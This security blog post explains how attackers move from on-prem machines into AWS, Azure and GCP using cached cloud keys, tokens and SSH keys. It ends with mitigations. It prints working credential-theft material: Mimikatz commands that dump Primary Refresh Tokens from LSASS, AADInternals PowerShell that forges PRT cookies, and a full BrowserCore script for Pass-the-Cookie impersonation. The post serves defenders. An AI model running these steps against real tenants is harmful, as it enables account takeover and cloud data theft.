
Bridging the Security Gap: Mitigating Lateral Movement Risks from On-Premises to Cloud Environments

This blog post will discuss lateral movement risks from on-prem to the cloud. We will explain attacker TTPs, and outline best practices for cloud builders and defenders to help secure their cloud environments and mitigate risk.


In our previous blog post in this series discussing lateral movement in the cloud, we delved into the application of lateral movement techniques from the cloud domain to managed Kubernetes clusters and assessed how attack vectors can differ across various cloud providers. 

In this fourth blog post, we’ll introduce some common lateral movement techniques that enable attackers to move laterally from on-prem domains to cloud environments. These techniques present unique risks and challenges that need to be addressed by cloud security professionals, developers, and DevOps teams alike. Understanding the threats posed by lateral movement is crucial to safeguarding your data and assets in the cloud. The gray area between cloud and on-prem environments is often overlooked as security ownership may be shared by multiple teams. In this blog, we will explore these risks and challenges, and discuss strategies for mitigating them.

On-prem-to-cloud attacker TTPs

Recent attacks have underscored the importance of addressing critical risks related to lateral movement attacks from an organization's on-prem network to its cloud domain. For instance, in one attack last month, MERCURY, a nation-state actor linked to the Iranian government, gained initial access to a hybrid environment and then used multiple tactics to discover additional credentials to extend its access to the organization's cloud infrastructure. Similarly, in the LAPSUS$ attack, the adversary conducted extensive reconnaissance and discovery operations to exfiltrate cloud credentials that would allow it to access the organization's cloud infrastructure.  

By leveraging their foothold in the environments, the threat actors were able to move laterally from on-prem to the cloud domain and execute destructive operations. These techniques and functionalities include—but are not limited to—exploiting long-term cleartext cloud keys and compromising AAD-integrated on-prem devices.

Stored and cached long-term cleartext cloud keys

Many users in an organization tend to use long-term cleartext cloud keys for programmatic access via the cloud provider’s native CLI from their own on-prem computer. Some keys, such as AWS user access keys, need to be downloaded manually and stored locally in a specific file, whereas others, like AAD/GCP user access/refresh tokens and AAD service principal secrets, are cached automatically the moment a user authenticates to their cloud identity.

These long-term cloud keys pose a significant security risk in the event of compromise by malicious actors, which is why it’s important to be familiar with safer alternatives and configurations that can mitigate the risk of lateral movement from on-prem to the cloud.

1. AWS user access keys

AWS access keys are typically stored locally on a machine in the AWS credentials file, which is located at the following path: 

  • Linux or macOS: ~/.aws/credentials (stored in cleartext) 

  • Windows: C:\Users\<username>\.aws\credentials (stored in cleartext)

The file is in INI format and contains the access key ID and secret access key for one or more IAM users or roles. These cloud keys are unencrypted and therefore pose a considerable security risk to cloud environments should a machine be compromised.  
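For reference, a typical credentials file looks like the following (the key values shown are AWS’s documented placeholder examples, not real credentials):

```ini
# ~/.aws/credentials — stored in cleartext
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
```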

On-prem users tend to use these AWS cloud keys to authenticate and execute cloud APIs on behalf of the IAM identity via the AWS CLI. 

It’s crucial to note that while AWS role access keys are temporary and expire by default within 1 hour, AWS user access keys never expire, allowing adversaries to gain persistence in the AWS cloud domain. 
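Because user access keys never expire on their own, rotating or removing stale keys is a worthwhile defensive habit. Below is a minimal, hypothetical Python sketch of the age check a defender might run against the output of AWS’s ListAccessKeys API (the key IDs and dates are made up; the field names mirror the API’s AccessKeyMetadata shape):

```python
from datetime import datetime, timedelta, timezone

def stale_keys(keys, max_age_days=90, now=None):
    """Return the IDs of access keys older than max_age_days.

    `keys` mirrors the AccessKeyMetadata entries returned by the
    IAM ListAccessKeys API (AccessKeyId, CreateDate).
    """
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=max_age_days)
    return [k["AccessKeyId"] for k in keys if k["CreateDate"] < cutoff]

# Illustrative data only — not real keys
keys = [
    {"AccessKeyId": "AKIAOLDKEYEXAMPLE", "CreateDate": datetime(2022, 1, 1, tzinfo=timezone.utc)},
    {"AccessKeyId": "AKIANEWKEYEXAMPLE", "CreateDate": datetime(2023, 3, 15, tzinfo=timezone.utc)},
]
flagged = stale_keys(keys, now=datetime(2023, 4, 1, tzinfo=timezone.utc))
print(flagged)  # ['AKIAOLDKEYEXAMPLE']
```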

2. Azure user access tokens and refresh tokens

Once an AAD user has been authenticated and has signed in to an Azure subscription via the Azure CLI from an on-prem machine (e.g. by running the az login command), the generated access token and refresh token are automatically cached in a local file called msal_token_cache with the following path: 

  • Linux or macOS: ~/.azure/msal_token_cache.json (cached in cleartext) 

  • Windows: C:\Users\<username>\.azure\msal_token_cache.bin (encrypted with DPAPI in local user context) 

The cached access token and refresh token are designed to allow the user to perform multiple Azure CLI operations without the need for re-authentication. When the access token expires, the Azure CLI automatically uses the cached refresh token to obtain a new access token. 

According to the official Microsoft documentation, “the default lifetime of an access token is variable. When issued, an access token’s default lifetime is assigned a random value ranging between 60-90 minutes (75 minutes on average).” On the other hand, the refresh token’s default lifetime is 90 days, which poses a greater security risk: adversaries may gain access to the cached refresh token, generate a new access token, move laterally to the AAD domain, and access the AAD user’s cloud resources. 

On Windows machines, although the file is encrypted with the local user’s Data Protection Application Programming Interface (DPAPI) MasterKey, it can easily be decrypted if attackers gain administrative privileges on the machine. 
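To illustrate what is at stake, the MSAL cache is a JSON document whose top-level sections include RefreshToken entries. The sketch below uses a fabricated cache excerpt (the token value is a fake placeholder; the client ID is the well-known Azure CLI application ID) to show how trivially a cached refresh token can be enumerated once the file is readable:

```python
import json

# Fabricated excerpt following MSAL's unified cache layout — the
# "secret" value is a fake placeholder, not a real refresh token.
cache = json.loads("""
{
  "RefreshToken": {
    "uid.utid-login.microsoftonline.com-refreshtoken-04b07795-8ddb-461a-bbee-02f9e1bf7b46--": {
      "credential_type": "RefreshToken",
      "client_id": "04b07795-8ddb-461a-bbee-02f9e1bf7b46",
      "secret": "<fake-refresh-token>"
    }
  }
}
""")

# Anyone who can read the file can list every cached refresh token:
tokens = [entry["secret"] for entry in cache.get("RefreshToken", {}).values()]
print(tokens)  # ['<fake-refresh-token>']
```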

3. Azure service principal secrets 

Upon signing in with a service principal using its associated secret from the Azure CLI (e.g. by running the az login --service-principal -u <app-id> -p <password> --tenant <tenant> command), the tenant ID, client ID, and service principal secret are automatically cached in a local file called service_principal_entries with the following path: 

  • Linux or macOS: ~/.azure/service_principal_entries.json (cached in cleartext) 

  • Windows: C:\Users\<username>\.azure\service_principal_entries.bin (encrypted with DPAPI in local user context) 

Since the lifetime of service principal secrets is usually very long (by default they expire after 6 months), adversaries may gain access to the cached secret, authenticate as the service principal, move laterally to the AAD domain, and access the service principal’s cloud resources. Similar to access and refresh tokens, the service_principal_entries local file can be decrypted by gaining administrative privileges on a Windows machine. 

4. GCP user access tokens and refresh tokens 

Upon authenticating to GCP from an on-prem machine with Google user credentials via the Gcloud Command-Line Interface (e.g. by running the gcloud auth login command), the generated access and refresh tokens are cached as cleartext in local files named access_tokens.db and credentials.db, respectively. Both files are SQLite database files with the following path: 

  • Linux or macOS: ~/.config/gcloud 

  • Windows: C:\Users\<username>\AppData\Roaming\gcloud 

Like with Azure, the cached access and refresh tokens allow the user to perform multiple Gcloud CLI operations without re-authenticating. When the access token expires, the Gcloud CLI automatically uses the cached refresh token to obtain a new access token. 

Whereas access tokens are valid for 1 hour by default, GCP refresh tokens have no fixed lifetime and remain valid until they are revoked or otherwise invalidated. This lack of expiration may enable an adversary to gain access to the cached refresh token, generate a new access token, move laterally to the GCP account, and finally access the compromised user’s cloud resources.

5. GCP service account private keys

Upon signing in with a service account via its associated private key from the Gcloud CLI (e.g. by running the gcloud auth activate-service-account --key-file=<sa-private-key> command), all the service account details including its private key value are cached locally as cleartext in the database credentials.db file. 

By default, service account keys do not have an expiration date and remain valid until deleted. An attacker may consequently leverage this by gaining access to the cached service account’s private key, authenticating as the service account, moving laterally to the GCP account, and accessing the service account’s cloud resources.
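Since all of these gcloud artifacts (access_tokens.db, credentials.db, and any downloaded key files) live in the user’s home directory, checking their file permissions is a cheap defensive control. The following is an illustrative Python sketch (not vendor tooling) that flags files readable by anyone other than their owner, demonstrated on a temporary stand-in file:

```python
import os
import stat
import tempfile

def readable_by_others(path: str) -> bool:
    """Return True if the group or world read bits are set on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))

# Demo on a throwaway file standing in for ~/.config/gcloud/credentials.db
with tempfile.NamedTemporaryFile(delete=False) as f:
    path = f.name

os.chmod(path, 0o644)
loose = readable_by_others(path)   # True — overly permissive
os.chmod(path, 0o600)
tight = readable_by_others(path)   # False — owner-only
print(loose, tight)
os.remove(path)
```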

6. SSH private keys associated with cloud compute instances 

Attackers might compromise SSH private keys on an on-prem device associated with cloud compute instances (e.g. EC2s and VMs), authenticate to one of them, move laterally, and gain an initial foothold within the cloud domain. 

Once the threat actors have access to the SSH private key, they can generate its associated public key and discover the domain name or IP address of the cloud compute instance to which the local user has previously connected. This information is stored in the local known_hosts file with the following path: 

  • Linux or macOS: ~/.ssh/known_hosts 

  • Windows: C:\Users\<username>\AppData\Roaming\ssh\known_hosts

With the SSH private key and the server’s IP address, the attackers can brute-force usernames or exploit default users within specific types of compute instances. For example, common default users for popular Linux-based AMIs are ec2-user for Amazon Linux 2 and ubuntu for Ubuntu instances.
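The public-key derivation step is a one-liner with standard OpenSSH tooling. The sketch below generates a throwaway key to stand in for a compromised one, then re-derives its public half exactly as an attacker would (the paths are illustrative):

```shell
# Generate a throwaway key pair to stand in for a stolen private key
rm -f /tmp/demo_key /tmp/demo_key.pub
ssh-keygen -t ed25519 -N '' -f /tmp/demo_key -q

# With only the private key in hand, the public key can be re-derived:
ssh-keygen -y -f /tmp/demo_key
```

The derived public key can then be matched against authorized_keys entries on candidate hosts harvested from known_hosts.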

Compromised AAD joined/registered/hybrid-joined devices 

There are three types of on-prem devices that can integrate with Azure AD: AAD joined, AAD registered, and hybrid AAD joined devices. The choice of integration method depends on an organization's requirements and limitations for device management and authentication. All three integration types enable a seamless Single Sign-On (SSO) experience on Windows 10 or later, Windows Server 2016 or later, iOS, and Android. In other words, a joined/registered/hybrid-joined machine can be managed and authenticated by AAD. 

To enhance the SSO experience on these devices, AAD issues a security token called the Primary Refresh Token (PRT). The PRT allows users to access resources and applications protected by AAD without needing to enter their credentials each time. It is issued when a user signs in to an AAD joined/hybrid-joined device using their organizational AAD credentials or adds a secondary work account to their AAD registered device. 

With AAD joined/hybrid-joined devices, the PRT is automatically renewed every 4 hours as long as the user remains signed in; with AAD-registered devices, the PRT is renewed either when the refresh token or the PRT is invalidated (requiring the user to reauthenticate). Once a PRT has been issued, it is valid for 14 days. 

The following techniques enable adversaries to exfiltrate and abuse PRTs associated with local AAD users in order to impersonate them and access their cloud resources. 

1. Pass-the-PRT attack 

Pro: exfiltrates any local AAD user’s PRT tokens. 

Cons: requires local admin privileges; can easily be detected or blocked by most AV/EDR solutions (including the built-in Microsoft Windows Defender). 

This technique involves stealing any local AAD user’s PRT tokens from the device’s memory. Once an attacker obtains a PRT token, they also extract the session key that is issued together with it. The session key is encrypted using DPAPI with the local AAD user’s MasterKey and is used as the Proof-of-Possession (PoP) key for any token request or PRT renewal. 

Ultimately, possessing a PRT token and decrypted session key enables an adversary to generate PRT cookies and authenticate as the AAD user, thereby accessing cloud resources and services in AAD/ARM with the user’s cloud permissions. 

The Pass-the-PRT attack can be executed with the Mimikatz and AADInternals tools: 

  • Using Mimikatz, the attacker exfiltrates the PRT token from memory (LSASS). Initially, they need to execute the privilege::debug command to enable the SeDebugPrivilege, which allows them to debug and interact with system processes including the Local Security Authority Subsystem Service (LSASS) process. Then, the attacker can execute the sekurlsa::cloudap command to exfiltrate the PRT token (colored in red in the figure below) and the encrypted session key (colored in purple). The attacker also discovers that the PRT token is associated with the AAD user LiorTest.

PRT token exfiltration from LSASS
  • Next, the attacker needs to decrypt the session key using the DPAPI MasterKey associated with the local AAD user. To access DPAPI, the attacker must escalate their privileges to SYSTEM by executing the Token::elevate and Dpapi::cloudapkd /keyvalue:<encrypted-session-key> /unprotect commands.

Session key decryption using DPAPI MasterKey
  • The attacker then utilizes the PRT token and the decrypted session key (clear key value) to generate a PRT cookie with a nonce using AADInternals.

# Add the PRT to a variable
$MimikatzPRT = "<PRT-Token>"

# Add padding
while($MimikatzPRT.Length % 4) {$MimikatzPRT += "="}

# Convert from Base64
$PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Add the session key (clear key) to a variable
$MimikatzKey = "<Clear-Key>"

# Convert to a byte array and Base64-encode
$SKey = [convert]::ToBase64String([byte[]]($MimikatzKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate a new PRT token with a nonce
New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
PRT cookie creation
  • The attacker navigates to https://login.microsoftonline.com/, clears all existing cookies, and injects the PRT cookie in their browser session using the following cookie values: 

    • Name: x-ms-RefreshTokenCredential 

    • Value: the generated PRT cookie 

    • HttpOnly: set to True

PRT cookie injection
  • The adversary finally refreshes the page and authenticates as the AAD user (LiorTest).

AAD user impersonation

2. Pass-the-Cookie attack

Pros: easily executed; does not require local admin privileges; less likely to be detected or blocked; better for defense evasion. 

Cons: only exfiltrates the compromised local AAD user’s PRT cookie. 

This technique involves directly stealing the PRT cookie from the compromised local AAD user (the cookie is digitally signed by the PRT session key). Pass-the-Cookie uses the built-in BrowserCore.exe utility that is installed by default on all AAD joined devices (located at C:\Program Files\Windows Security\BrowserCore) and is utilized by Microsoft Edge and Chrome web browsers to implement Azure SSO via PRT cookie generation.  

An adversary can run the following PowerShell script (adapted from AADInternals’ Get-UserPRTToken) to exfiltrate a PRT cookie associated with a compromised local AAD user and impersonate their identity:

# Get the nonce
$response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/Common/oauth2/token" -Body "grant_type=srv_challenge"
$nonce = $response.Nonce


# There are two possible locations
$locations = @(
    "$($env:ProgramFiles)\Windows Security\BrowserCore\browsercore.exe"
    "$($env:windir)\BrowserCore\browsercore.exe"
)

# Check the locations
foreach($file in $locations)
{
    if(Test-Path $file)
    {
        $browserCore = $file
    }
}

if(!$browserCore)
{
  throw "Browsercore not found!"
}

# Create the process
$p = New-Object System.Diagnostics.Process
$p.StartInfo.FileName = $browserCore
$p.StartInfo.UseShellExecute = $false
$p.StartInfo.RedirectStandardInput = $true
$p.StartInfo.RedirectStandardOutput = $true
$p.StartInfo.CreateNoWindow = $true

# Create the message body
$body = @"
{
  "method":"GetCookies",
  "uri":"https://login.microsoftonline.com/common/oauth2/authorize?sso_nonce=$nonce",
  "sender":"https://login.microsoftonline.com"
}
"@
# Start the process
$p.Start() | Out-Null
$stdin =  $p.StandardInput
$stdout = $p.StandardOutput

# Write the input
$stdin.BaseStream.Write([bitconverter]::GetBytes($body.Length),0,4) 
$stdin.Write($body)
$stdin.Close()

# Read the output
$response=""
while(!$stdout.EndOfStream)
{
  $response += $stdout.ReadLine()
}

Write-Debug "RESPONSE: $response"
        
$p.WaitForExit()

# Strip the stuff from the beginning of the line
$response = $response.Substring($response.IndexOf("{")) | ConvertFrom-Json

# Check for error
if($response.status -eq "Fail")
{
  Throw "Error getting PRT: $($response.code). $($response.description)"
}

# Return the last one
$tokens = $response.response.data
if($tokens.Count -gt 1)
{
  return $tokens[$tokens.Count - 1]
}
else
{
  return $tokens
} 

Recommended best practices

Here are 5 key best practices that any organization should implement in its environment to mitigate the risk of an on-prem-to-cloud lateral movement attack:

1. Secure AAD joined/registered/hybrid-joined devices

  • Restrict the number of local administrators 

Limiting the number of local administrators authorized on your AAD joined or registered devices can lower the risk of device compromise via an admin user. This also decreases the probability of total device compromise and exfiltration of all PRTs linked to a local AAD user. 

  • Create “Attack Surface Reduction” (ASR) rules 

Attack Surface Reduction (ASR) rules are a set of security features introduced in Windows 10 and Windows Server 2016 that are designed to prevent malware attacks by reducing the attack surface. It’s highly recommended to enable the following ASR rule: “Block credential stealing from the Windows local security authority subsystem”. This ASR rule stops credential stealing by locking down Local Security Authority Subsystem Service (LSASS) and thus keeping malicious actors from accessing your device’s memory and sensitive data such as PRTs.  

However, the rule should initially be deployed in Audit mode, since Block mode may impede legitimate processes; identify and exclude those processes before switching to Block mode in production. 

To deploy the ASR rule in Audit mode, execute the following PowerShell command:

Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions AuditMode

To deploy it in Block mode, execute the following PowerShell command:

Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled

  • Enable MFA and require strong passwords 

Make sure a strong password is configured for each AAD user, especially for highly privileged users added to AAD joined/registered devices. Moreover, enable MFA on Windows devices through Windows Hello for Business. You may also consider creating a tenant-wide policy that configures use of Windows Hello for Business on Windows 10 or Windows 11 devices at the time of enrollment in Microsoft Intune, or alternatively, using an Identity protection profile to manage Windows Hello for Business on groups of devices that have already enrolled in Intune. 

This best practice helps reduce the likelihood of device compromise via RDP brute-forcing.

2. Adopt alternatives for AWS programmatic access  

To reduce the security risk associated with long-term AWS cloud keys, consider using any of the following alternatives:

  • Utilize AWS IAM Identity Center 

The AWS IAM Identity Center is a web-based portal that allows administrators to manage user access to multiple accounts and business applications from a single portal, while providing users with an SSO experience. 

AWS CLI can be configured to authenticate users with the IAM Identity Center to obtain temporary credentials to execute CLI commands using the SSO token provider configuration or your AWS SDK. As long as you are signed in and the session has not ended, the AWS CLI automatically renews expired credentials. Sessions can last anywhere from 15 minutes to 7 days and strict MFA policies can also be configured for each sign-in.
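As a sketch, an SSO token provider configuration in ~/.aws/config might look like this (the profile and session names, account ID, and start URL are illustrative):

```ini
# ~/.aws/config — SSO token provider configuration (values are illustrative)
[profile dev-readonly]
sso_session = my-sso
sso_account_id = 111122223333
sso_role_name = ReadOnlyAccess
region = us-east-1

[sso-session my-sso]
sso_start_url = https://my-org.awsapps.com/start
sso_region = us-east-1
sso_registration_scopes = sso:account:access
```

After running aws sso login --profile dev-readonly, the CLI fetches short-lived credentials automatically, and no long-term keys are written to ~/.aws/credentials.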

  • Leverage AWS CloudShell 

AWS CloudShell is a fully managed browser-based shell environment that enables users to interact with their AWS resources from a CLI using common Linux utilities, programming languages, and scripts. It’s an on-demand environment that is pre-configured with the CLI and includes pre-installed tools for popular programming languages such as Python, Node.js, and Ruby. 

AWS CloudShell is a safer alternative to long-term cloud keys when resources can be accessed by logging in to the console; it eliminates the risks associated with key storage, management, exposure, loss, and theft.

3. Secure Azure access tokens, refresh tokens, and secrets 

  • Upgrade your Azure CLI version 

In the event your Azure CLI is below v2.30.0, upgrade it as soon as possible (the current version as of this writing is 2.46.0). Starting with v2.30.0, Azure CLI uses the Microsoft Authentication Library (MSAL) as its underlying authentication library; previous versions use the Azure Active Directory Authentication Library (ADAL) and cache the tokens and service principal entries in a file named accessToken.json, which is stored unencrypted on all operating systems. MSAL, on the other hand, utilizes the AAD v2.0 authentication flow to provide more functionality and increased security for token caching, such as encrypting the tokens and service principal entries on Windows machines via DPAPI. 

Although an attacker might still be able to decrypt those cached files with local admin privileges, this security measure is important as it reduces the potential attack surface. 

You can validate your current Azure CLI version by running the following command: az version. 

  • Configure AAD Conditional Access policy to minimize refresh token lifetime 

Sign-in frequency defines the time period before a user must sign in again to access a resource. The AAD default configuration for sign-in frequency is a rolling window of 90 days, or in other words, the lifetime of a refresh token. As a best practice, it’s highly recommended to reduce this lifetime to limit the possibility of a refresh token being compromised and abused to generate new access tokens associated with AAD users. 

To customize the refresh token’s default lifetime, consider creating a Conditional Access policy that controls a refresh token’s expiration date.  

  • Use service principal certificates for authentication 

Service principal authentication via certificates rather than secrets is considered more secure, since certificates are less prone to exposure. Because service principal secrets are string values, they are often stored in config files, hardcoded in scripts, or simply saved by an admin, and thus pose a greater risk of compromise.

Additionally, no credentials or service principal entries are cached locally on the machine when authenticating AAD service principals with certificates via the Azure CLI. However, when authenticating with secrets, all the service principal entries required for authentication (tenant ID, client ID, and secret) are cached locally on the machine. 
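For example, the Azure CLI accepts a PEM file (certificate plus private key) in place of a secret; the IDs and path below are placeholders:

```shell
# Sign in with a certificate instead of a secret — no entries are cached locally
az login --service-principal -u <app-id> -p /path/to/cert.pem --tenant <tenant-id>
```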

  • Utilize Azure Cloud Shell 

Azure Cloud Shell is a terminal that allows you to manage your Azure resources through an interactive, authenticated, and browser-accessible interface. You can choose between Bash and PowerShell, depending on your preferred shell experience. Cloud Shell runs on a temporary host provided for each user session, ensuring a secure and personalized environment. Your Cloud Shell session times out after 20 minutes of inactivity. 

Azure Cloud Shell eliminates the need to authenticate as your AAD user via the Azure CLI, therefore mitigating the risk of cached token exposure or theft.

4. Secure cached GCP access tokens, refresh tokens, and keys  

  • Curb the session duration of refresh tokens 

Although GCP refresh tokens never expire, as an administrator you can set a specific session length that will define how long users can access the GCP console and Cloud SDK (Gcloud CLI) without having to re-authenticate. 

To set the re-authentication policy for your GCP account, follow the steps described here. As a best practice, it’s highly recommended to restrict the session duration of refresh tokens to reduce the likelihood of a token being compromised and abused to generate new access tokens associated with GCP users. 

  • Set expiration date for service account keys 

By default, service account keys never expire, but you can change this by setting an expiration date for all newly created keys in your project, folder, or organization. To set an expiration date, add an organization policy that enforces the constraints/iam.serviceAccountKeyExpiryHours constraint. Enforcing this constraint for your project, folder, or organization will set an expiration date for all subsequent, newly created service account keys within the parent resource; existing keys will not be affected. 

  • Leverage GCP user credentials as a proxy for a service account in local development 

As a developer, you usually set the GOOGLE_APPLICATION_CREDENTIALS environment variable to include the JSON key for a service account so that when a GCP client library or SDK makes a request to a GCP service, it will authenticate using the service account. 

When developing or testing your code locally on your on-prem machine, it’s advised to use your GCP user credentials as a proxy for a service account, in light of the security risks associated with service account keys such as key exposure and the default lack of expiration dates. 

To use this authentication method for your GCP SDKs, make sure the GOOGLE_APPLICATION_CREDENTIALS environment variable is not set and run the following command to authenticate as a GCP user: gcloud auth application-default login.

  • Use GCP Cloud Shell 

GCP Cloud Shell is an interactive, web-based shell environment that is hosted in the cloud. It allows users to access a command-line interface within a web browser and execute various commands and run scripts as the logged-in GCP user. The Cloud Shell environment includes popular command-line tools like gcloud, kubectl, and bq, as well as language-specific tools for Python, Java, and Node.js. It also provides an integrated code editor, file editor, and web preview functionality. 

GCP Cloud Shell eliminates the need to authenticate as your GCP user via the Gcloud CLI, therefore mitigating the risk of cached token exposure or theft.

5. Authenticate to compute instances using cloud APIs 

In the event you’re running compute instances in AWS or GCP (EC2s and VM instances), consider authenticating to these instances through dedicated cloud services based on IAM permissions rather than SSH or RDP authentication.  

Authenticating to compute instances via AWS SSM or GCP IAP may provide a more secure, centralized, and streamlined way to manage infrastructure access. These services enable you to leverage IAM to define granular permissions for specific users or groups, which can help limit access to your instances. Moreover, SSM and IAP log all user activity centrally, providing you with a clear audit trail of who accessed your instances, as well as when and from where, facilitating any subsequent investigation.
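As a sketch, the corresponding sign-in commands look like the following (the instance ID, VM name, and zone are placeholders):

```shell
# AWS: interactive shell via Systems Manager Session Manager
# (requires the SSM agent and IAM permissions; no SSH key, no open port 22)
aws ssm start-session --target i-0123456789abcdef0

# GCP: SSH tunneled through Identity-Aware Proxy
# (requires IAP-TCP forwarding permissions; no public IP needed)
gcloud compute ssh my-vm --zone us-central1-a --tunnel-through-iap
```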

Summary 

In this fourth blog post, we explored the topic of lateral movement techniques from an on-prem domain to the cloud. We covered two techniques (Pass-the-PRT and Pass-the-Cookie) for moving laterally to an AAD environment by compromising an on-prem AAD joined/registered/hybrid-joined device. 

We also discussed how hackers can move laterally to different cloud domains by accessing various cleartext long-term access keys, access tokens, refresh tokens, secrets, and private keys stored or cached in compromised on-prem devices. Additionally, we highlighted the potential risks posed by private SSH keys, which could allow unauthorized access to cloud compute resources. 

To address these security risks, we provided recommended best practices for each lateral movement technique to help organizations mitigate the risk of lateral movement. Our goal with this blog post was to elaborate on the importance of securing on-prem devices to prevent unauthorized access to cloud environments and to provide actionable steps that organizations can take to enhance their security posture. 
